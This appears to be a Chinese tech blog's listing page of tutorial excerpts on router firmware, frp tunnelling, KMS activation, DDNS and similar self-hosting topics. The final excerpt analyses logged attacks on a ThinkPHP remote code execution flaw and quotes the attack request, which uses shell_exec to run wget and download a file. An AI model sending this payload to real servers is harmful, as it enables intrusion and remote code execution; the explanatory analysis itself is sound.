通知 爱刷机 路由器教程 →→《省钱助手

斐讯N1刷入Armbian写入emmc,N1刷CentOS7升级到CentOS 7.7方法

斐讯N1刷入Armbian写入emmc,N1刷CentOS7升级到CentOS 7.7方法再提供rootf文件,因此自己摸索了一下从7.4升级到7.7的办法步骤简单记录如下1.U盘刷入Armbian首先从https://yadi.sk/d/pHxaRAs-tZiei下载最新的版本,因为我们最后还是要刷成CentOS,所以下个最小的就行,比如Debian不带desktop的版本。将.xz文件解开以后是个.img文件。将这个文件用Win32Imager或者USBImageTool,或者在lin

阅读全文:斐讯N1刷入Armbian写入emmc,N1刷CentOS7升级到CentOS 7.7方法


frp内网穿透自定义域名80端口访问,配置frp实现内网穿透工具,frp服务端/客户端配置

frp内网穿透自定义域名80端口访问,配置frp实现内网穿透工具,frp服务端/客户端配置普及前不会有好转。虽然可以通过客服要回公网ip,但是难度太大了,就算能要到运营商也得恶心恶心你,所以目前外网访问家里路由器、NAS、智能家居等成了问题。对于没有公网IP的解决办法也有很多:群晖的Anyconnect、花生壳、Ngrok、Frp等。从效果来看Frp效果最好,所以本文重点写这个教程。以前已经写过很多关于frp内网穿透的相关教程了,比如Padavan固件frp客户端设置Linux系统Frp一键安装脚本&管理脚本frps穿透服务端和frpc客户端设置frp相关文章

阅读全文:frp内网穿透自定义域名80端口访问,配置frp实现内网穿透工具,frp服务端/客户端配置


路由器frp内网穿透设置,frps穿透服务端和frpc客户端设置,frp服务器frps.ini配置

路由器frp内网穿透设置,frps穿透服务端和frpc客户端设置,frp服务器frps.ini配置tps://github.com/fatedier/frp/releases根据你的服务器操作系统下载对应的压缩包:windows64位:XXX_windows_amd64.zipwindows32位:XXX_windows_386.ziplinux64位:XXX_linux_amd64.tar.gzlinux32位:XXX_linux_386.tar.gz注意:由于frp0.18版本之后不兼容以前的frp2、解压下载包下载包里包含客户端(frpc)和服务

阅读全文:路由器frp内网穿透设置,frps穿透服务端和frpc客户端设置,frp服务器frps.ini配置


openwrt-dnsmasq使局域网用户免配置自动kms激活,openwrt-dnsmasq设置kms服务自动激活

openwrt-dnsmasq使局域网用户免配置自动kms激活,openwrt-dnsmasq设置kms服务自动激活,或者刷入的固件本来就自带KMS服务,比如:kms标签Padavan开启KMS服务Openwrt开启KMS服务可以说py-kms与vlmcsd的适用性真的非常之广,不管你在windows,linux下甚至安卓下都可以搭建私有的kms服务。但是最后都会遇到的问题是需要在被激活主机上运行批处理命令,不免有些繁琐。曾闻中国某高等学府批量购买企业windows许可,你的电脑只要连入校园网,不需要任何配置就可以激活系统,不免神往。查资料发现,这是通过配置DNS服务器

阅读全文:openwrt-dnsmasq使局域网用户免配置自动kms激活,openwrt-dnsmasq设置kms服务自动激活


Padavan、LEDE、梅林固件一键安装ONMP脚本代码,Padavan、LEDE、梅林固件上安装Entware

Padavan、LEDE、梅林固件一键安装ONMP脚本代码,Padavan、LEDE、梅林固件上安装EntwareEntware 的路由器,目前已经在Padavan、LEDE(openwrt)、梅林上测试成功。和LNMP有什么不同?LNMP代表的是:Linux系统下Nginx/MySQL/PHP这种网站服务器架构,而为了区分路由器环境的不同,使用的ONMP这个命名,本质还是LNMP。项目地址:https://github.com/xzhih/ONMP特性此脚本不仅自动化安装web环境,还内置了一些好用

阅读全文:Padavan、LEDE、梅林固件一键安装ONMP脚本代码,Padavan、LEDE、梅林固件上安装Entware


OpenWrt固件自动挂载USB移动硬盘开启swap虚拟内存,华硕Padavan固件开启swap虚拟内存

OpenWrt固件自动挂载USB移动硬盘开启swap虚拟内存,华硕Padavan固件开启swap虚拟内存真的要用它,虽然swap可以帮你增加可用内存,但是,带来的代价却非常大,一旦使用到swap内存,你的路由将会变得反应非常慢,并且,在反复调用swap空间的时候,可能会对你的u盘、sd卡造成不可修复的伤害。所以,非到十分必要,不要开启swap。开启方法有两种华硕Padavan老毛子固件开启路由的swap虚拟内存方法一:比较简单,直接在路由器设置页面设置即可。在最新的老毛子华硕Padavan固件里面已经可以直接开启“swap”,不需要使用命令开启了。如

阅读全文:OpenWrt固件自动挂载USB移动硬盘开启swap虚拟内存,华硕Padavan固件开启swap虚拟内存


网件NETGEAR WNDR3800基于LEAN源码FlowOffload加速,高通SFE加速固件

网件NETGEAR WNDR3800基于LEAN源码FlowOffload加速,高通SFE加速固件800(家里的老路由TPlinkTL-R1600+早已不堪重负,因为挂载的各种网络设备多(20多个),经常死机需要重启。),看参数比TL-R1660+好多了,立马上山来学习个人在玩路由方面纯小白,不过因为工作关系,多少有一点linux指令基础,通过几个小时翻阅山上各位大神的帖子,基本掌握了WNDR3800刷机的一些窍门,在此做一个初步整理以方便和我一样的小白,信息基本都来自本山,再次感谢各路大神网件NETGEARWNDR3800基于LEA

阅读全文:网件NETGEAR WNDR3800基于LEAN源码FlowOffload加速,高通SFE加速固件


nmrpflash.exe网件路由器救砖工具Nmrpflash网件路由器救砖修复工具通用版0.9.11支持win10

nmrpflash.exe网件路由器救砖工具Nmrpflash网件路由器救砖修复工具通用版0.9.11支持win10n7.win8和win10系统的下通用的救砖神器,它还支持linux和mac系统呢,这里只提供win系统的版本给大家。http://dl.ioozu.com/file/1397394-419449109链接:https://pan.baidu.com/s/1ub3PWb9C-A4shkUaaDa56Q提取码:yq8s具体修复教程:1、将下载得到的压缩包解压,解压出来的“nmrpflash.exe”文件放入电脑D盘根目录2、将需要恢复的网件官方固件也放入电脑D盘根

阅读全文:nmrpflash.exe网件路由器救砖工具Nmrpflash网件路由器救砖修复工具通用版0.9.11支持win10


TL-WR703N刷PulseAudio固件,使用TL-WR703N无线音响打造,TL-WR703N专用PulseAudio固件使用

TL-WR703N刷PulseAudio固件,使用TL-WR703N无线音响打造,TL-WR703N专用PulseAudio固件使用分享,和视频在线查看,由于TL-WR703N这款路由器非常小巧,所有就入手了一台,以前也介绍了一款也是非常小巧的路由器“极路由go”这款看下图。是不是非常小巧呢,只有手机充电头那么大,以前分享过这款路由器的固件极路由go刷openwrt固件今天继续分享一款TL-WR703N路由器的NAS固件。TL-WR703NPulseAudio固件Pulseaudio是一种声音服务器,可

阅读全文:TL-WR703N刷PulseAudio固件,使用TL-WR703N无线音响打造,TL-WR703N专用PulseAudio固件使用


TL-WR703N刷NAS固件,使用TL-WR703N打造家庭网盘,TL-WR703N专用NAS固件安装

TL-WR703N刷NAS固件,使用TL-WR703N打造家庭网盘,TL-WR703N专用NAS固件安装-WR703N是一款小而强大的路由器,不足百元的价格,拥有一款无线路由器具有的基本功能,而且可以支持USB3G无线网卡。但703N的潜力不止如此,目前有不少网友开始了基于703N的折腾,OpenWrt通用固件已经不是啥新鲜事了,OpenWrt论坛有一位强人s7mx1,在论坛中放出了基于703N实现伪AirPlay的方法,让703这款产品离AirportExpress又近了一点点。703N虽然没有3.5mm耳机插口

阅读全文:TL-WR703N刷NAS固件,使用TL-WR703N打造家庭网盘,TL-WR703N专用NAS固件安装


Aria2、utorrent、Deluge、Transmission、Rutorrent、Qbittorrent BT离线下载程序Docker镜像及安装

Aria2、utorrent、Deluge、Transmission、Rutorrent、Qbittorrent BT离线下载程序Docker镜像及安装说明:最近看到很多小伙伴对离线下载啥的,兴趣蛮大,博主以前也水了不少了BT下载相关的脚本和安装,不过都没Docker简单,这里就找了一些用的人比较多,也经常在维护的BT离线程序的Docker镜像,包括Aria2、utorrent、Deluge、Transmission、Rutorrent、Qbittorrent,算是比较全了,这里就分享下。安装Docker首先安

阅读全文:Aria2、utorrent、Deluge、Transmission、Rutorrent、Qbittorrent BT离线下载程序Docker镜像及安装


webbench怎么安装使用?网站压力测试工具之webbench使用,Linux下网站压力测试工具webbench安装

webbench怎么安装使用?网站压力测试工具之webbench使用,Linux下网站压力测试工具webbench安装网站模拟3w左右的并发请求,可以控制时间、是否使用缓存、是否等待服务器回复等等,且对中小型网站有明显的效果,基本上可以测出中小型网站的承受能力,对于大型的网站,如百度、淘宝这些巨型网站没有意义,因为其承受能力非常大。同时测试结果也受自身网速、以及自身主机的性能与内存的限制,性能好、内存大的主机可以模拟的并发就明显要多。webbench最多可以模拟3万个并发连接去测试网站的负载能力,个人感觉要比Apache自带的ab压力测试工具好,安装使用也特别方便。webbench安装及简单

阅读全文:webbench怎么安装使用?网站压力测试工具之webbench使用,Linux下网站压力测试工具webbench安装


阿里云API实现动态域名解析ddns脚本及设置教程,阿里云API动态域名解析ddns脚本,padavan设置DDNS

阿里云API实现动态域名解析ddns脚本及设置教程,阿里云API动态域名解析ddns脚本,padavan设置DDNS,它不同于我们常用的DNS解析,而是专门用于对付那种没有固定公网IP的服务器地址解析的。典型的使用情况就是:自家宽带构建小服务器,没有固定IP,想要上线,除了写脚本发邮件外,就只有ddns这一条路可以走了。目前来说,国内最知名的可能就是出了名的难用不稳定的花生壳了。国外的话有一个dynu也很不错。现在阿里云开放了API,那么我们能否使用阿里云的API自行实现一个ddns呢?原理自然很简单,自己实现一个小客户端,然后定期获取自身外网

阅读全文:阿里云API实现动态域名解析ddns脚本及设置教程,阿里云API动态域名解析ddns脚本,padavan设置DDNS


openwrt怎么编译v2瑞?openwrt安装v2瑞教程,v2瑞配置文件client-config.json设置

openwrt怎么编译v2瑞?openwrt安装v2瑞教程,v2瑞配置文件client-config.json设置,不支持https,所以需要重新安装一个。>opkgupdate>opkginstallwget然后就可以高高兴兴去下二进制安装包了,不料这mipsle的安装包竟然有17MB,一个主程序和辅助工具再加上IP数据集,我的小Y只有16MB的Flash,真是天要亡我。还是不死心,go在编译时去掉符号表能省不少空间,还能再挤挤,果然在谷歌第一页就翻到了大牛留下的笔记:https://gobomb.github.io/post/cross-complie-v2瑞/

阅读全文:openwrt怎么编译v2瑞?openwrt安装v2瑞教程,v2瑞配置文件client-config.json设置


Docker安装sish服务器安装命令sish内网穿透服务器端sish的部署和基本用法sish内网穿透教程

Docker安装sish服务器安装命令sish内网穿透服务器端sish的部署和基本用法sish内网穿透教程本地端口暴露在外网,作者声称其为Servo/Ngrok替代方案,仅使用SSH的HTTP(S)、WS(S)、TCP隧道连接到他们的localhost服务器,该工具和Servo差不多一样,不同就是Servo官方提供了免费的SSH客户端,而sish作者提供的客户端貌似因为滥用关闭了,所以就需要我们自己搭建了,这里就水下Docker和手动安装。Docker安装Github地址:https://github.com/antoniomika/sish1、安装Docker#

阅读全文:Docker安装sish服务器安装命令sish内网穿透服务器端sish的部署和基本用法sish内网穿透教程


\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击

\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookiemstshash=Administr经过在网上查资料发现这是主要针对的是thinkphp的远程代码执行漏洞进行的攻击,1、请求1:/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O

阅读全文:\/x03\/x00\/x00*\/xE0\/x00\/x00\/x00\/x00\/x00Cookie mstshash=Administr针对thinkphp的远程代码执行漏洞进行的攻击